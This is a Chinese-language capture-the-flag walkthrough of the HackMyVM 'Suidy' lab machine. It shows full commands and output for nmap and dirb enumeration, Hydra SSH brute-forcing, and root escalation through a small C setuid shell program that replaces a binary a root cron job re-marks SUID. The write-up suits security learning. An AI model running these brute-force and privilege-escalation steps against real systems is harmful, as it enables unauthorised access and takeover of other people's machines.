[HMV] Suidy
0x00 配置
攻击机 IP: 172.16.1.25
靶机 IP: 172.16.1.146
0x01 攻击
使用 Nmap 扫描目标靶机开放的端口
┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.146
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 09:13 CST
Nmap scan report for 172.16.1.146
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8acb7e8a7282849a11436115c1e6320b (RSA)
| 256 7a0eb6dd8feea770d9b1b56e448fc049 (ECDSA)
|_ 256 8018e6c7010ec66d7df4d29fc9d06f4c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:69:F7:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.56 seconds
只开放了 22 (SSH) 和 80 (HTTP) 端口。访问 80 看看
没什么东西。扫描一下后台
┌──(root㉿Kali-VM)-[~]
└─# dirb http://172.16.1.146/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 8 09:27:30 2023
URL_BASE: http://172.16.1.146/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.1.146/ ----
+ http://172.16.1.146/index.html (CODE:200|SIZE:22)
+ http://172.16.1.146/robots.txt (CODE:200|SIZE:362)
-----------------
END_TIME: Wed Mar 8 09:27:31 2023
DOWNLOADED: 4612 - FOUND: 2
找到一个 /robots.txt,打开看看
打开之后发现 /hi,可惜打开 404 了。第二行还有一串奇怪的编码,有点像摩斯电码,实际上并不是。把页面拉到最下面,发现了一个路径
/shehatesme
访问试试
She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist!
提示在这个目录下放了很多 TXT 文件,里面是 "用户名/密码" 的格式,还提示只需要一个 SecList 里面的小字典。这里用 BurpSuite 爆破
在 Payload 处加载字典
等字典跑完,返回结果为 200 的就是我们需要的内容了
把里面的用户名和密码都复制出来,粘贴到文本文档中当字典
用 Hydra 工具跑字典,爆破 SSH
┌──(root㉿Kali-VM)-[~/work/suidy]
└─#
hydra -L user.txt -P pass.txt 172.16.1.146 ssh -t 32 -vV
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
...
[22][ssh] host: 172.16.1.146 login: theuser password: thepass
我擦,好不容易整出来字典,你告诉我密码就是网页上的... 连接 SSH
[C:\~]$ ssh theuser@172.16.1.146
Connecting to 172.16.1.146:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 27 00:41:28 2020
theuser@suidy:~$ id
uid=1000(theuser) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
theuser@suidy:~$ whoami
theuser
检查一下家目录,发现了 user.txt
theuser@suidy:~$ ls -al /home
total 16
drwxr-xr-x 4 root root 4096 sep 26 2020 .
drwxr-xr-x 18 root root 4096 sep 26 2020 ..
drwxr-xr-x 3 suidy suidy 4096 sep 27 2020 suidy
drwxr-xr-x 3 theuser theuser 4096 mar 8 02:45 theuser
theuser@suidy:~$ ls -al /home/theuser/
total 36
drwxr-xr-x 3 theuser theuser 4096 mar 8 02:45 .
drwxr-xr-x 4 root root 4096 sep 26 2020 ..
-rw------- 1 theuser theuser 29 sep 27 2020 .bash_history
-rw-r--r-- 1 theuser theuser 220 sep 26 2020 .bash_logout
-rw-r--r-- 1 theuser theuser 3526 sep 26 2020 .bashrc
drwxr-xr-x 3 theuser theuser 4096 sep 26 2020 .local
-rw-r--r-- 1 theuser theuser 807 sep 26 2020 .profile
-rw-r--r-- 1 theuser theuser 11 sep 26 2020 user.txt
-rw------- 1 theuser theuser 51 mar 8 02:45 .Xauthority
theuser@suidy:~$ cat /home/theuser/user.txt
HMV2353IVI
接下来就要提权了。检查一下有特权的程序
theuser@suidy:/tmp$ find / -perm -u=s -type f 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
发现一个 /home/suidy/suidyyyyy,运行之后可以切换到 suidy 用户
theuser@suidy:~$ /home/suidy/suidyyyyy
suidy@suidy:~$
检查一下 suidy 用户的家目录,发现一个 note.txt
suidy@suidy:~# ls -al /home/suidy/
total 52
drwxr-xr-x 3 suidy suidy 4096 sep 27 2020 .
drwxr-xr-x 4 root root 4096 sep 26 2020 ..
-rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
-rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
-rw-r--r-- 1 suidy suidy 3526 sep 26 2020 .bashrc
drwxr-xr-x 3 suidy suidy 4096 sep 26 2020 .local
-r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
-rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
-rwsrwsr-x 1 root theuser 16712 mar 8 03:28 suidyyyyy
suidy@suidy:~# cat /home/suidy/note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!
-suidy
提示说 "root know it and run an script to be sure that my file has SUID. ",有一个脚本会赋予 suidy 的文件 SUID 权限?监测一下定时任务
suidy@suidy:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
...
2023/03/08 03:17:36 CMD: UID=0 PID=1 | /sbin/init
2023/03/08 03:18:01 CMD: UID=0 PID=11920 | /usr/sbin/CRON -f
2023/03/08 03:18:01 CMD: UID=0 PID=11921 | /usr/sbin/CRON -f
2023/03/08 03:18:01 CMD: UID=0 PID=11922 | /bin/sh -c sh /root/timer.sh
2023/03/08 03:18:01 CMD: UID=0 PID=11923 | sh /root/timer.sh
2023/03/08 03:19:01 CMD: UID=0 PID=11924 | /usr/sbin/CRON -f
2023/03/08 03:19:01 CMD: UID=0 PID=11925 | /usr/sbin/CRON -f
2023/03/08 03:19:01 CMD: UID=0 PID=11926 | /bin/sh -c sh /root/timer.sh
2023/03/08 03:19:01 CMD: UID=0 PID=11927 | sh /root/timer.sh
看来就是 /root/timer.sh 会定期赋予 /home/suidy/suidyyyyy 文件 SUID 权限了。那么是不是可以另外写一个文件把原先的 /home/suidy/suidyyyyy 替换?suidy 用户并没有覆写 /home/suidy/suidyyyyy 的权限,exit 一下回到 theuser,发现可以覆写这个文件。
去 /tmp 目录编写一个 C 程序,用来启动带有 root 的终端
theuser@suidy:/home/suidy$ cd /tmp
theuser@suidy:/tmp$ nano suid.c
theuser@suidy:/tmp$ gcc suid.c -o suidyyyyy
// SUID.C
#include <unistd.h>
#include <stdlib.h>
void main(){
setuid(0);
setgid(0);
system("bash -i");
}
然后用它覆盖原本的文件
theuser@suidy:/tmp$ cp ./suidyyyyy /home/suidy/suidyyyyy
等待一分钟后,发现 /home/suidy/suidyyyyy 已经被赋予了权限
theuser@suidy:/tmp$ ls -la /home/suidy/suidyyyyy
-rwsrwsr-x 1 root theuser 16712 mar 8 03:28 /home/suidy/suidyyyyy
然后再执行这个文件,成功获得 root
theuser@suidy:/tmp$ /home/suidy/suidyyyyy
root@suidy:/tmp# id
uid=0(root) gid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)
root@suidy:/tmp# whoami
root
查看 /root 下的 flag
root@suidy:/tmp# ls -al /root
total 32
drwx------ 3 root root 4096 sep 27 2020 .
drwxr-xr-x 18 root root 4096 sep 26 2020 ..
-rw------- 1 root root 44 sep 27 2020 .bash_history
drwxr-xr-x 3 root root 4096 sep 26 2020 .local
-rw-r--r-- 1 root root 148 ago 17 2015 .profile
-rw-r--r-- 1 root root 11 sep 27 2020 root.txt
-rw-r--r-- 1 root root 66 sep 26 2020 .selected_editor
-rwxr-xr-x 1 root root 42 sep 26 2020 timer.sh
root@suidy:/tmp# cat /root/root.txt
HMV0000EVE
root@suidy:/tmp# cat /root/timer.sh
#!/bin/sh
chmod +s /home/suidy/suidyyyyy
0x02 总结
做字典的地方有大佬用正则直接匹配,我比较笨,所以只能人肉做字典了;
提权的部分又是典中典定时任务。
